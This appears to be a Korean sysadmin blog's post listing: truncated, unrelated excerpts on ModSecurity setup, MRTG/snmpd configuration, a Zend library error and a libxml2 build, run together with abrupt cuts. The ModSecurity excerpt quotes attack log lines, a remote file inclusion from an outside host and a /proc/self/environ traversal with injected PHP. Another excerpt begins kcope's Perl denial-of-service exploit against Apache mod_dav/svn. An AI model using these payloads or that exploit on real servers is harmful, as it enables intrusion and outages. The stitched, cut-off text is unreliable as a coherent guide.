아래 로그는 id4rom.txt 같은 문서가 있는 주소에 include 시켜서 서버의 정보 같은것을 보거나 공격을 합니다.”GET /blog/tag//?pag=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1″ 200 42371 “-” “libwww-perl/5.806″PHP Injection 공격방법으로 서버의 디렉토리를 이동하는 공격 패턴입니다.”GET /blog/archive//calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1” 200 58549 “-” “XXX<? echo “w0000t”; ?>XXX”위 같은 로그내용이.. ㅠ _ㅠ 계속해서 기록되길래 ModSecurity 모듈로 방어 해보고자 설치를 했습니다.1. mod_unique_id 컴파일아파치에 mod_unique_id 모듈이 설치 되어 있어야 합니다.아파치 소스 디렉토리에 가서 설치를 진행하며 아파치의 apxs 를 이용하여 mod_unique_id.c 를 컴파일 합니다.(소스 디렉토리 : /root/src/httpd-2.2.11 | apache2 설치디렉토리 : /etc/apache2)yongbok# cd /root/src/httpd-2.2.11/modules/metadatayongbok# /etc/apache2/bin/apxs -cia mod_unique_id.c컴파일이 끝나면 자동으로 모듈이 생성되며 httpd.conf 문서 모듈 라인에 자동으로 붙습니다.2. libxml2 설치패키지로 설치해도 되긴 한데 리눅스 배포판마다
집에서 서버를 돌리고 있는 웹서버의 트래픽과 NAT 으로 물린 내부 네트워크의 트래픽 상황을 알아보기 위해 MRTG 를 설치 하였다. 설치 방법은 FreeBSD 의 포트로 설치를 진행한다. 1. snmpd 설치 yongbok# cd /usr/ports/net-mgmt/net-snmp && make install clean 설치가 완료 되면 snmpd.conf 파일을 생성하여 아래와 같이 사용자 환경에 맞게 셋팅을 해주면 된다. yongbok# vi /usr/local/share/snmp/snmpd.conf # sec.name | source | community com2sec local localhost private # MyROFroup 는 읽기만 가능 하고 MyRWGroup 으로 설정하면 쓰기도 가능해진다. # 쓰기권한까지 설정할때는 신중하게 생각해서 해야한다. # group 이것을 안써주면 cfgmaker 로 cfg 파일 생성시 에러를 발생하게 된다. 나름 트러블 슈팅 group MyROGroup v1 local group
Apache mod_dav / svn Remote Denial of Service Exploit### furoffyourcat.pl### Apache mod_dav / svn Remote Denial of Service Exploit### by kcope / June 2009###### Will exhaust all system memory### Needs Authentication on normal DAV###### This can be especially serious stuff when used against### svn (subversion) servers!! Svn might let the PROPFIND slip through### without authentication. bwhahaaha :o)### use at your own risk!##################################################################use IO::Socket;use MIME::Base64;sub usage { print “Apache mod_dav / svn Remote Denial of Service Exploitn”; print “by kcope in 2009n”; print “usage: perl furoffyourcat.pl <remotehost> <webdav folder> n”; print “example: perl furoffyourcat.pl svn.XXX.com /projects/n”;exit;}if ($#ARGV < 1) {usage();}$hostname =
FreeBSD 에서 Zend Optimizer 설치시 Shared object “libm.so.4” not found, required by “php” 라는 에러가 나올 경우 아래 라이브러리를 설치 합니다.yongbok# cd /usr/ports/misc/compat6x && make install clean만약 apache error 로그에 Shared object “libm.so.4” not found, required by “ZendExtensionManager.so”libm.so.4 를 찾을수 없다고 하면 php 가 설치된 디렉토리의 Zend 디렉토리를 삭제 후 다시시도 해보시길 바랍니다. ( /etc/php/Zend , /usr/local/php/Zend , /usr/local/php5/Zend )
NetBSD에서 PHP 컴파일시 libxml2 가 없다고 아래처럼 에러가 뜰때가 있다.configure: error: xml2-config not found. Please check your libxml2 installation.이 경우엔 libxml2 를 다운받아 수동으로 설치해주는 방법으로 해결 할수 있다.(prefix /root/src)yongbok# wget -P /root/src ftp://xmlsoft.org/libxml2/LATEST_LIBXML2yongbok# tar xzvf /root/src/LATEST_LIBXML2.tar.gzyongbok# ./configureyongbok# makeyongbok# make install